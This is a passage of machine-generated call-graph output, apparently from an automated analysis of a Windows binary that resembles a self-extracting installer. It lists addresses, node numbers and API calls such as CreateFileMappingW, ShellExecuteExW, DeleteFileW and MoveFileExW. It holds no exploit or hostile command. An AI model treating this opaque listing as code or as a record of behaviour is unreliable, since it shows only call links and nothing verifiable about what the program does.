KiUserCallbackDispatcher 24783->24789 24783->24855 24790 b5dcb5 GetDlgItem 24784->24790 24940 b5dca9 24784->24940 25058 b5c5dd GetCurrentDirectoryW 24785->25058 24786->24785 24791 b50597 53 API calls 24787->24791 24789->24855 24794 b5dcec SetFocus 24790->24794 24795 b5dcc9 SendMessageW SendMessageW 24790->24795 24796 b5dc03 SetDlgItemTextW 24791->24796 24797 b5db90 24792->24797 24793 b5e2c3 GetDlgItem 24798 b5e2e6 SetWindowTextW 24793->24798 24799 b5e2e0 24793->24799 24800 b5dcfc 24794->24800 24814 b5dd08 24794->24814 24795->24794 24801 b5dc0e 24796->24801 25082 b41273 6 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 24797->25082 25059 b5cb49 GetClassNameW 24798->25059 24799->24798 24805 b50597 53 API calls 24800->24805 24808 b5dc1b GetMessageW 24801->24808 24801->24855 24803 b5e196 24806 b50597 53 API calls 24803->24806 24809 b5dd06 24805->24809 24811 b5e1a6 SetDlgItemTextW 24806->24811 24813 b5dc32 IsDialogMessageW 24808->24813 24808->24855 24952 b5f7fc 24809->24952 24810 b5e531 SetDlgItemTextW 24810->24855 24816 b5e1ba 24811->24816 24813->24801 24818 b5dc41 TranslateMessage DispatchMessageW 24813->24818 24819 b50597 53 API calls 24814->24819 24823 b50597 53 API calls 24816->24823 24818->24801 24821 b5dd3f 24819->24821 24826 b44c00 _swprintf 51 API calls 24821->24826 24822 b5dd77 24828 b5dd96 24822->24828 25084 b4bccb 24822->25084 24857 b5e1dd _wcslen 24823->24857 24824 b5e331 24825 b5e361 24824->24825 24831 b50597 53 API calls 24824->24831 24835 b5ea07 121 API calls 24825->24835 24876 b5e419 24825->24876 24826->24809 24964 b4baf1 24828->24964 24829 b5ea07 121 API calls 24829->24824 24834 b5e344 SetDlgItemTextW 24831->24834 24841 b50597 53 API calls 24834->24841 24842 b5e37c 24835->24842 24836 b5e4c0 24844 b5e4d2 24836->24844 24845 b5e4c9 EnableWindow 24836->24845 24838 b5e22e 24849 b50597 53 API calls 24838->24849 24839 b5ddba 24975 b5cbb6 SetCurrentDirectoryW 24839->24975 24840 b5ddaf GetLastError 24840->24839 24847 b5e358 SetDlgItemTextW 24841->24847 24856 b5e38e 24842->24856 24875 b5e3b3 24842->24875 24843 b5dd90 25087 b5cebf 9 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 24843->25087 24846 b5e4ef 24844->24846 25107 b41323 GetDlgItem EnableWindow 24844->25107 24845->24844 24853 b5e516 24846->24853 24865 b5e50e SendMessageW 24846->24865 24847->24825 24849->24855 24851 b5e40c 24861 b5ea07 121 API calls 24851->24861 24853->24855 24867 b50597 53 API calls 24853->24867 24854 b5ddce 24859 b5ddd7 GetLastError 24854->24859 24860 b5dde5 24854->24860 24855->24773 25105 b5be55 31 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 24856->25105 24857->24838 24863 b50597 53 API calls 24857->24863 24858 b5e4e5 25108 b41323 GetDlgItem EnableWindow 24858->25108 24859->24860 24866 b5de5c 24860->24866 24871 b5de6b 24860->24871 24873 b5ddf5 GetTickCount 24860->24873 24861->24876 24869 b5e211 24863->24869 24865->24853 24870 b5e097 24866->24870 24866->24871 24874 b5db97 24867->24874 24868 b5e3a7 24868->24875 24877 b44c00 _swprintf 51 API calls 24869->24877 24993 b41341 GetDlgItem ShowWindow 24870->24993 24879 b5e03c 24871->24879 24881 b5de84 GetModuleFileNameW 24871->24881 24882 b5e032 24871->24882 24872 b5e4a1 25106 b5be55 31 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 24872->25106 24883 b44c00 _swprintf 51 API calls 24873->24883 24874->24810 24874->24855 24875->24851 24888 b5ea07 121 API calls 24875->24888 24876->24836 24876->24872 24884 b50597 53 API calls 24876->24884 24877->24838 24887 b50597 53 API calls 24879->24887 25088 b512bc 82 API calls 24881->25088 24882->24783 24882->24879 24890 b5de12 24883->24890 24884->24876 24885 b5e4bd 24885->24836 24891 b5e046 24887->24891 24892 b5e3e1 24888->24892 24889 b5e0a7 24994 b41341 GetDlgItem ShowWindow 24889->24994 24976 b4b01e 24890->24976 24896 b44c00 _swprintf 51 API calls 24891->24896 24892->24851 24897 b5e3ea DialogBoxParamW 24892->24897 24894 b5deac 24895 b44c00 _swprintf 51 API calls 24894->24895 24899 b5dece CreateFileMappingW 24895->24899 24901 b5e064 24896->24901 24897->24783 24897->24851 24898 b5e0b1 24902 b50597 53 API calls 24898->24902 24905 b5df2c GetCommandLineW 24899->24905 24906 b5dfa3 __InternalCxxFrameHandler 24899->24906 24915 b50597 53 API calls 24901->24915 24903 b5e0bb SetDlgItemTextW 24902->24903 24995 b41341 GetDlgItem ShowWindow 24903->24995 24909 b5df3d 24905->24909 24907 b5dfae ShellExecuteExW 24906->24907 24922 b5dfc9 24907->24922 25089 b5d705 SHGetMalloc 24909->25089 24910 b5de4a 24986 b4af2f 24910->24986 24911 b5de3f GetLastError 24911->24910 24912 b5e0cd SetDlgItemTextW GetDlgItem 24916 b5e102 24912->24916 24917 b5e0ea GetWindowLongW SetWindowLongW 24912->24917 24919 b5e07e 24915->24919 24996 b5ea07 24916->24996 24917->24916 24918 b5df59 25090 b5d705 SHGetMalloc 24918->25090 24934 b5e00c 24922->24934 24935 b5dff8 Sleep 24922->24935 24924 b5df65 25091 b5d705 SHGetMalloc 24924->25091 24925 b5ea07 121 API calls 24927 b5e11e 24925->24927 25027 b5fdf7 24927->25027 24928 b5df71 25092 b5136b 24928->25092 24930 b5e022 UnmapViewOfFile CloseHandle 24930->24882 24934->24882 24934->24930 24935->24922 24935->24934 24940->24783 24940->24803 24943 b413c8 24942->24943 24945 b4136f 24942->24945 25110 b5021d GetWindowLongW SetWindowLongW 24943->25110 24944 b413d5 24944->24771 24944->24772 24944->24855 24945->24944 25109 b50244 62 API calls 3 library calls 24945->25109 24948 b41391 24948->24944 24949 b413a4 GetDlgItem 24948->24949 24949->24944 24950 b413b4 24949->24950 24950->24944 24951 b413ba SetWindowTextW 24950->24951 24951->24944 24953 b5d864 5 API calls 24952->24953 24954 b5f817 GetDlgItem 24953->24954 24955 b5f836 24954->24955 24956 b5f86e SendMessageW SendMessageW 24954->24956 24959 b5f841 ShowWindow SendMessageW SendMessageW 24955->24959 24957 b5f8cd SendMessageW SendMessageW SendMessageW 24956->24957 24958 b5f8ae 24956->24958 24960 b5f924 SendMessageW 24957->24960 24961 b5f901 SendMessageW 24957->24961 24958->24957 24959->24956 24962 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24960->24962 24961->24960 24963 b5dd62 24962->24963 24963->24822 25083 b5ff24 5 API calls 2 library calls 24963->25083 24965 b4bafb 24964->24965 24966 b4bbd0 24965->24966 24969 b4bba8 24965->24969 24971 b4bbf9 24965->24971 25111 b4bee1 24965->25111 24967 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24966->24967 24968 b4bbf0 24967->24968 24968->24839 24968->24840 24969->24966 24970 b4bee1 13 API calls 24969->24970 24970->24966 25126 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24971->25126 24974 b4bbfe 24975->24854 24977 b4b028 24976->24977 24978 b4b096 CreateFileW 24977->24978 24979 b4b08d 24977->24979 24978->24979 24980 b4b0dd 24979->24980 24981 b4da1e 6 API calls 24979->24981 24984 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24980->24984 24982 b4b0c2 24981->24982 24982->24980 24983 b4b0c6 CreateFileW 24982->24983 24983->24980 24985 b4b111 24984->24985 24985->24910 24985->24911 24987 b4af6e 24986->24987 24988 b4af5d 24986->24988 24987->24866 24988->24987 24989 b4af70 24988->24989 24990 b4af69 24988->24990 25150 b4afd0 24989->25150 25145 b4b11a 24990->25145 24993->24889 24994->24898 24995->24912 24997 b5ea19 24996->24997 24998 b5f717 24997->24998 25167 b5d5dd 24997->25167 24999 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24998->24999 25001 b5e110 24999->25001 25001->24925 25002 b5d5dd 6 API calls 25005 b5ea7c _wcslen _wcsrchr 25002->25005 25003 b5ed57 SetWindowTextW 25003->25005 25005->24998 25005->25002 25005->25003 25010 b5eb4b SetFileAttributesW 25005->25010 25018 b5f73c 25005->25018 25023 b5ef75 SendMessageW 25005->25023 25173 b5d41c 25005->25173 25192 b5c5dd GetCurrentDirectoryW 25005->25192 25193 b4dd18 25005->25193 25198 b4c3de 11 API calls 25005->25198 25199 b4c367 FindClose 25005->25199 25200 b5d76e 76 API calls 3 library calls 25005->25200 25201 b666ae 25005->25201 25012 b5ec05 GetFileAttributesW 25010->25012 25026 b5eb65 __cftof _wcslen 25010->25026 25012->25005 25014 b5ec17 DeleteFileW 25012->25014 25014->25005 25016 b5ec28 25014->25016 25021 b44c00 _swprintf 51 API calls 25016->25021 25017 b5ef35 GetDlgItem SetWindowTextW SendMessageW 25017->25005 25214 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25018->25214 25020 b5f741 25022 b5ec48 GetFileAttributesW 25021->25022 25022->25016 25024 b5ec5d MoveFileW 25022->25024 25023->25005 25024->25005 25025 b5ec75 MoveFileExW 25024->25025 25025->25005 25026->25005 25026->25012 25197 b4d8ac 51 API calls 2 library calls 25026->25197 25028 b5fe13 25027->25028 25226 b526df 25028->25226 25030 b5fe59 25230 b48ddf 25030->25230 25032 b5feb7 25240 b48ff5 25032->25240 25040 b5f9f8 25039->25040 25775 b5c556 25040->25775 25043 b5fa1b GetWindow 25046 b5fae1 25043->25046 25050 b5fa34 25043->25050 25044 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25045 b5e256 25044->25045 25045->24779 25045->24780 25046->25044 25047 b5fa41 GetClassNameW 25047->25050 25048 b5fa65 GetWindowLongW 25049 b5fac9 GetWindow 25048->25049 25051 b5fa75 SendMessageW 25048->25051 25049->25046 25049->25050 25050->25046 25050->25047 25050->25048 25050->25049 25051->25049 25052 b5fa8b GetObjectW 25051->25052 25780 b5c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25052->25780 25054 b5faa2 25781 b5c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25054->25781 25782 b5c79c 13 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25054->25782 25057 b5fab3 SendMessageW DeleteObject 25057->25049 25058->24793 25060 b5cb74 25059->25060 25061 b5cb99 25059->25061 25060->25061 25065 b5cb8b FindWindowExW 25060->25065 25062 b5cba7 25061->25062 25063 b5cb9e SHAutoComplete 25061->25063 25064 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25062->25064 25063->25062 25066 b5cbb2 25064->25066 25065->25061 25067 b5d243 25066->25067 25068 b5d255 25067->25068 25069 b4147c 43 API calls 25068->25069 25070 b5d2af 25069->25070 25785 b420eb 25070->25785 25073 b5d2c5 25075 b416b8 86 API calls 25073->25075 25074 b5d2d1 25792 b41b0e 25074->25792 25081 b5d2cd 25075->25081 25077 b5d2ed __InternalCxxFrameHandler ___std_exception_copy 25080 b416b8 86 API calls 25077->25080 25078 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25079 b5d357 25078->25079 25079->24824 25079->24829 25080->25081 25081->25078 25082->24874 25083->24822 25864 b4bcdd 25084->25864 25087->24828 25088->24894 25089->24918 25090->24924 25091->24928 25093 b51379 25092->25093 25095 b51383 25092->25095 25874 b512f6 25093->25874 25096 b513f8 GetCurrentProcessId 25095->25096 25098 b5139d 25095->25098 25097 b513d2 MapViewOfFile 25096->25097 25097->24906 25098->25097 25880 b47bad 76 API calls 2 library calls 25098->25880 25100 b513c0 25881 b47d49 76 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25100->25881 25102 b513c9 25882 b47ba8 RaiseException Concurrency::cancel_current_task 25102->25882 25105->24868 25106->24885 25107->24858 25108->24846 25109->24948 25110->24944 25112 b4beee 25111->25112 25113 b4bf1c 25112->25113 25114 b4bf0f CreateDirectoryW 25112->25114 25115 b4bccb 8 API calls 25113->25115 25114->25113 25116 b4bf4f 25114->25116 25117 b4bf22 25115->25117 25119 b4bf5e 25116->25119 25133 b4c2e5 25116->25133 25118 b4bf62 GetLastError 25117->25118 25127 b4da1e 25117->25127 25118->25119 25122 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25119->25122 25124 b4bf85 25122->25124 25124->24965 25125 b4bf3c CreateDirectoryW 25125->25116 25125->25118 25126->24974 25130 b4da28 _wcslen 25127->25130 25128 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25129 b4bf38 25128->25129 25129->25118 25129->25125 25131 b4daf7 GetCurrentDirectoryW 25130->25131 25132 b4da6f _wcslen 25130->25132 25131->25132 25132->25128 25143 b61590 25133->25143 25136 b4c314 25138 b4da1e 6 API calls 25136->25138 25137 b4c33f 25139 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25137->25139 25140 b4c326 25138->25140 25141 b4c34d 25139->25141 25140->25137 25142 b4c32a SetFileAttributesW 25140->25142 25141->25119 25142->25137 25144 b4c2f2 SetFileAttributesW 25143->25144 25144->25136 25144->25137 25146 b4b14d 25145->25146 25147 b4b123 25145->25147 25146->24987 25147->25146 25156 b4bc65 25147->25156 25151 b4afdc 25150->25151 25152 b4affa 25150->25152 25151->25152 25154 b4afe8 FindCloseChangeNotification 25151->25154 25153 b4b019 25152->25153 25166 b47b49 76 API calls 25152->25166 25153->24987 25154->25152 25157 b61590 25156->25157 25158 b4bc72 DeleteFileW 25157->25158 25159 b4bc91 25158->25159 25160 b4bcb9 25158->25160 25161 b4da1e 6 API calls 25159->25161 25162 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25160->25162 25164 b4bca3 25161->25164 25163 b4b14b 25162->25163 25163->24987 25164->25160 25165 b4bca7 DeleteFileW 25164->25165 25165->25160 25166->25153 25170 b5d5e7 25167->25170 25168 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25169 b5d6fc 25168->25169 25169->25005 25171 b5d6bc ExpandEnvironmentStringsW 25170->25171 25172 b5d6df 25170->25172 25171->25172 25172->25168 25176 b5d42e 25173->25176 25174 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25175 b5d4f6 25174->25175 25175->25017 25177 b5d4ba 25176->25177 25178 b5d500 25176->25178 25177->25174 25215 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25178->25215 25180 b5d505 25181 b41366 66 API calls 25180->25181 25182 b5d556 25181->25182 25183 b5d574 25182->25183 25184 b5d5b5 SetDlgItemTextW 25182->25184 25185 b5d562 25182->25185 25186 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25183->25186 25184->25183 25185->25183 25187 b5d583 GetDlgItemTextW 25185->25187 25188 b5d56f 25185->25188 25189 b5d5d4 25186->25189 25216 b51421 25187->25216 25188->25183 25191 b5d57a EndDialog 25188->25191 25189->25017 25191->25183 25192->25005 25194 b4dd22 25193->25194 25195 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25194->25195 25196 b4dda6 25195->25196 25196->25005 25197->25026 25198->25005 25199->25005 25200->25005 25202 b6bb34 25201->25202 25203 b6bb41 25202->25203 25204 b6bb4c 25202->25204 25205 b6bc8e __vsnwprintf_l 21 API calls 25203->25205 25206 b6bb54 25204->25206 25213 b6bb5d _abort 25204->25213 25211 b6bb49 25205->25211 25207 b6bafa _free 20 API calls 25206->25207 25207->25211 25208 b6bb87 HeapReAlloc 25208->25211 25208->25213 25209 b6bb62 25224 b6bc7b 20 API calls _abort 25209->25224 25211->25005 25213->25208 25213->25209 25225 b6a2ec 7 API calls 2 library calls 25213->25225 25214->25020 25215->25180 25218 b5142a _wcslen 25216->25218 25217 b51455 25217->25188 25218->25217 25220 b51334 25218->25220 25221 b51342 __InternalCxxFrameHandler 25220->25221 25222 b5136b 82 API calls 25221->25222 25223 b51366 25222->25223 25223->25217 25224->25211 25225->25213 25227 b526ec _wcslen 25226->25227 25259 b41925 25227->25259 25229 b52704 25229->25030 25231 b48deb __EH_prolog3 25230->25231 25272 b4ee0f 25231->25272 25233 b48e0e 25234 b6121c 27 API calls 25233->25234 25235 b48e52 __cftof 25234->25235 25236 b6121c 27 API calls 25235->25236 25237 b48e7a 25236->25237 25278 b56b0d 25237->25278 25239 b48eac 25239->25032 25241 b48fff 25240->25241 25242 b49080 25241->25242 25308 b4c37a 25241->25308 25245 b490e5 25242->25245 25285 b496b9 25242->25285 25244 b49127 25247 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25244->25247 25245->25244 25314 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25245->25314 25248 b4914e 25247->25248 25250 b48ebb 25248->25250 25766 b4ab26 8 API calls __cftof 25250->25766 25252 b48ee6 25254 b48ef7 Concurrency::cancel_current_task 25252->25254 25767 b54396 25252->25767 25255 b42179 26 API calls 25254->25255 25256 b48f1e 25255->25256 25773 b4eea4 86 API calls Concurrency::cancel_current_task 25256->25773 25260 b4198f 25259->25260 25261 b41937 25259->25261 25260->25229 25262 b41960 25261->25262 25269 b47bad 76 API calls 2 library calls 25261->25269 25263 b666ae 22 API calls 25262->25263 25265 b41980 25263->25265 25265->25260 25271 b47c32 75 API calls 25265->25271 25266 b41956 25270 b47c32 75 API calls 25266->25270 25269->25266 25270->25262 25271->25260 25273 b4ee1b __EH_prolog3 25272->25273 25274 b6121c 27 API calls 25273->25274 25275 b4ee59 25274->25275 25276 b6121c 27 API calls 25275->25276 25277 b4ee7d 25276->25277 25277->25233 25279 b56b19 __EH_prolog3 25278->25279 25280 b6121c 27 API calls 25279->25280 25281 b56b33 25280->25281 25282 b56b4a 25281->25282 25284 b52f22 80 API calls 25281->25284 25282->25239 25284->25282 25286 b496d4 25285->25286 25315 b4147c 25286->25315 25288 b496fb 25289 b4970c 25288->25289 25478 b4b982 25288->25478 25293 b49743 25289->25293 25325 b41b63 25289->25325 25292 b4973f 25292->25293 25344 b420a1 142 API calls __EH_prolog3 25292->25344 25470 b416b8 25293->25470 25300 b497fe 25306 b49842 25300->25306 25346 b53cf2 25300->25346 25301 b4976b 25305 b4c37a 12 API calls 25301->25305 25307 b497e4 25301->25307 25305->25301 25306->25293 25349 b4441e 25306->25349 25361 b49906 25306->25361 25345 b4988e 81 API calls 25307->25345 25309 b4c38f 25308->25309 25310 b4c3bd 25309->25310 25753 b4c4a8 25309->25753 25310->25241 25313 b4c3a4 FindClose 25313->25310 25314->25244 25316 b41488 __EH_prolog3 25315->25316 25317 b4ee0f 27 API calls 25316->25317 25318 b414b7 25317->25318 25319 b6121c 27 API calls 25318->25319 25322 b4152b 25318->25322 25321 b41518 25319->25321 25321->25322 25323 b4668f 43 API calls 25321->25323 25482 b4cc45 25322->25482 25323->25322 25324 b415b3 __cftof 25324->25288 25326 b41b6f __EH_prolog3 25325->25326 25338 b41bbc 25326->25338 25341 b41cef 25326->25341 25502 b4145d 25326->25502 25329 b41d21 25514 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25329->25514 25331 b4441e 116 API calls 25335 b41d6c 25331->25335 25332 b41d2e 25332->25331 25332->25341 25333 b41db4 25337 b41de7 25333->25337 25333->25341 25515 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25333->25515 25335->25333 25336 b4441e 116 API calls 25335->25336 25336->25335 25337->25341 25343 b4b8c0 79 API calls 25337->25343 25338->25329 25338->25332 25338->25341 25339 b4441e 116 API calls 25340 b41e38 25339->25340 25340->25339 25340->25341 25341->25292 25343->25340 25344->25301 25345->25300 25531 b6029f 25346->25531 25350 b4442e 25349->25350 25351 b4442a 25349->25351 25360 b4b8c0 79 API calls 25350->25360 25351->25306 25352 b44440 25353 b44469 25352->25353 25354 b4445b 25352->25354 25542 b42fcb 116 API calls 3 library calls 25353->25542 25359 b4449b 25354->25359 25541 b43ab7 104 API calls 3 library calls 25354->25541 25357 b44467 25357->25359 25543 b425f4 74 API calls 25357->25543 25359->25306 25360->25352 25362 b49918 25361->25362 25365 b4997a 25362->25365 25374 b49da2 Concurrency::cancel_current_task 25362->25374 25589 b5ab94 117 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25362->25589 25364 b4a820 25366 b4a825 25364->25366 25367 b4a86c 25364->25367 25365->25364 25372 b4999b 25365->25372 25365->25374 25366->25374 25634 b48c06 166 API calls 25366->25634 25367->25374 25635 b5ab94 117 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25367->25635 25368 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25369 b4a862 25368->25369 25369->25306 25372->25374 25544 b46936 25372->25544 25374->25368 25375 b49a71 25550 b4d63a 25375->25550 25377 b49aa4 25378 b49bba 25377->25378 25590 b4bf89 57 API calls 4 library calls 25377->25590 25378->25374 25381 b49ce2 25378->25381 25592 b49582 38 API calls 25378->25592 25385 b4c37a 12 API calls 25381->25385 25389 b49d40 25381->25389 25384 b49c24 25591 b69ea8 26 API calls 2 library calls 25384->25591 25385->25389 25387 b4a0ac 25601 b4f014 97 API calls 25387->25601 25554 b48f84 25389->25554 25391 b49dd1 25412 b49e33 25391->25412 25593 b44916 27 API calls 2 library calls 25391->25593 25395 b4a0c3 25398 b4a118 25395->25398 25415 b4a0ce 25395->25415 25396 b4a004 25396->25395 25400 b4a033 25396->25400 25405 b4a09b 25398->25405 25603 b493ac 119 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25398->25603 25399 b4a116 25406 b4af2f 80 API calls 25399->25406 25402 b4a174 25400->25402 25400->25405 25407 b4bccb 8 API calls 25400->25407 25401 b4a7d9 25408 b4af2f 80 API calls 25401->25408 25402->25401 25403 b4a1e2 25402->25403 25604 b4b288 25402->25604 25560 b4c94d 25403->25560 25405->25399 25405->25402 25406->25374 25409 b4a068 25407->25409 25408->25374 25409->25405 25600 b4ac09 97 API calls 25409->25600 25411 b49f71 25598 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25411->25598 25412->25374 25412->25411 25420 b49f78 Concurrency::cancel_current_task 25412->25420 25594 b48db7 41 API calls 25412->25594 25595 b4f014 97 API calls 25412->25595 25596 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25412->25596 25597 b4953f 98 API calls 25412->25597 25415->25399 25602 b49155 123 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25415->25602 25418 b4a231 25422 b4c94d 27 API calls 25418->25422 25420->25396 25599 b4bd61 50 API calls 3 library calls 25420->25599 25435 b4a247 25422->25435 25424 b4a1d0 25608 b47e45 77 API calls 25424->25608 25426 b4a31d 25427 b4a511 25426->25427 25428 b4a37c 25426->25428 25431 b4a537 25427->25431 25432 b4a523 25427->25432 25451 b4a3b5 25427->25451 25429 b4a43c 25428->25429 25430 b4a394 25428->25430 25438 b4d63a 5 API calls 25429->25438 25433 b4a3db 25430->25433 25440 b4a3a3 25430->25440 25564 b553f0 25431->25564 25619 b4ab81 25432->25619 25433->25451 25615 b488a9 112 API calls 25433->25615 25435->25426 25439 b4a2f4 25435->25439 25609 b4b1e6 25435->25609 25437 b4a550 25574 b55099 25437->25574 25444 b4a466 25438->25444 25439->25426 25613 b4b427 82 API calls 25439->25613 25614 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25440->25614 25616 b49582 38 API calls 25444->25616 25447 b4a502 25447->25306 25450 b4a47e 25450->25451 25452 b4a494 25450->25452 25453 b4a4ab 25450->25453 25451->25447 25456 b4a5c5 25451->25456 25630 b4c905 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25451->25630 25617 b485fc 86 API calls 25452->25617 25618 b4a8b9 103 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25453->25618 25459 b4a656 25456->25459 25631 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25456->25631 25458 b4a764 25458->25401 25461 b4c2e5 8 API calls 25458->25461 25459->25401 25459->25458 25460 b4a712 25459->25460 25583 b4b949 SetEndOfFile 25459->25583 25584 b4b7e2 25460->25584 25462 b4a7bf 25461->25462 25462->25401 25632 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25462->25632 25465 b4a759 25467 b4afd0 77 API calls 25465->25467 25467->25458 25468 b4a7cf 25633 b47d49 76 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25468->25633 25471 b416ca 25470->25471 25473 b416dc Concurrency::cancel_current_task 25470->25473 25471->25473 25750 b41729 26 API calls 25471->25750 25474 b42179 26 API calls 25473->25474 25475 b4170b 25474->25475 25751 b4eea4 86 API calls Concurrency::cancel_current_task 25475->25751 25479 b4b999 25478->25479 25480 b4b9a3 25479->25480 25752 b47c87 78 API calls 25479->25752 25480->25289 25483 b4cc65 __cftof 25482->25483 25490 b4cb21 25483->25490 25488 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25489 b4cc95 25488->25489 25489->25324 25497 b4cb02 25490->25497 25492 b4cb96 25493 b42179 25492->25493 25494 b42184 25493->25494 25495 b42193 25493->25495 25501 b413db 26 API calls Concurrency::cancel_current_task 25494->25501 25495->25488 25498 b4cb10 25497->25498 25499 b4cb0b 25497->25499 25498->25492 25500 b42179 26 API calls 25499->25500 25500->25498 25501->25495 25516 b418b2 25502->25516 25505 b4b8c0 25506 b4b8d2 25505->25506 25510 b4b8e5 25505->25510 25508 b4b8f0 25506->25508 25529 b47cd8 77 API calls 25506->25529 25508->25338 25509 b4b8f8 SetFilePointer 25509->25508 25511 b4b914 GetLastError 25509->25511 25510->25508 25510->25509 25511->25508 25512 b4b91e 25511->25512 25512->25508 25530 b47cd8 77 API calls 25512->25530 25514->25341 25515->25337 25517 b418c4 25516->25517 25523 b41476 25516->25523 25518 b418ed 25517->25518 25526 b47bad 76 API calls 2 library calls 25517->25526 25520 b666ae 22 API calls 25518->25520 25521 b4190a 25520->25521 25521->25523 25528 b47c32 75 API calls 25521->25528 25522 b418e3 25527 b47c32 75 API calls 25522->25527 25523->25505 25526->25522 25527->25518 25528->25523 25529->25510 25530->25508 25532 b602ac 25531->25532 25533 b50597 53 API calls 25532->25533 25534 b602da 25533->25534 25535 b44c00 _swprintf 51 API calls 25534->25535 25536 b602ec 25535->25536 25537 b5f7fc 21 API calls 25536->25537 25538 b602fd 25537->25538 25539 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25538->25539 25540 b53d08 25539->25540 25540->25306 25541->25357 25542->25357 25543->25359 25545 b46946 25544->25545 25636 b46852 25545->25636 25548 b46979 25549 b469b1 25548->25549 25641 b4d122 6 API calls 3 library calls 25548->25641 25549->25375 25553 b4d644 25550->25553 25551 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25552 b4d7d8 25551->25552 25552->25377 25553->25551 25555 b48f99 25554->25555 25556 b48fd1 25555->25556 25652 b47e25 74 API calls 25555->25652 25556->25374 25556->25387 25556->25391 25558 b48fc9 25653 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25558->25653 25561 b4c95b 25560->25561 25563 b4c965 25560->25563 25562 b6121c 27 API calls 25561->25562 25562->25563 25563->25418 25565 b55405 25564->25565 25568 b5540f ___std_exception_copy 25564->25568 25654 b47c32 75 API calls 25565->25654 25567 b5553f 25656 b647d0 RaiseException 25567->25656 25568->25567 25569 b55495 25568->25569 25573 b554b9 __cftof 25568->25573 25655 b55323 75 API calls 3 library calls 25569->25655 25572 b5556b 25573->25437 25575 b550cb 25574->25575 25577 b550a2 25574->25577 25582 b550bf 25575->25582 25673 b57576 137 API calls 2 library calls 25575->25673 25576 b550c1 25672 b58250 132 API calls 25576->25672 25577->25576 25579 b550b7 25577->25579 25577->25582 25657 b58c7e 25579->25657 25582->25451 25583->25460 25585 b4b7f3 25584->25585 25588 b4b802 25584->25588 25586 b4b7f9 FlushFileBuffers 25585->25586 25585->25588 25586->25588 25587 b4b87f SetFileTime 25587->25465 25588->25587 25589->25365 25590->25384 25591->25378 25592->25381 25593->25412 25594->25412 25595->25412 25596->25412 25597->25412 25598->25420 25599->25396 25600->25405 25601->25420 25602->25399 25603->25405 25605 b4b291 GetFileType 25604->25605 25606 b4a1ba 25604->25606 25605->25606 25606->25403 25607 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25606->25607 25607->25424 25608->25403 25610 b4b1ff 25609->25610 25612 b4b8c0 79 API calls 25610->25612 25611 b4b231 25611->25439 25612->25611 25613->25426 25614->25451 25615->25451 25616->25450 25617->25451 25618->25451 25620 b4ab8d __EH_prolog3 25619->25620 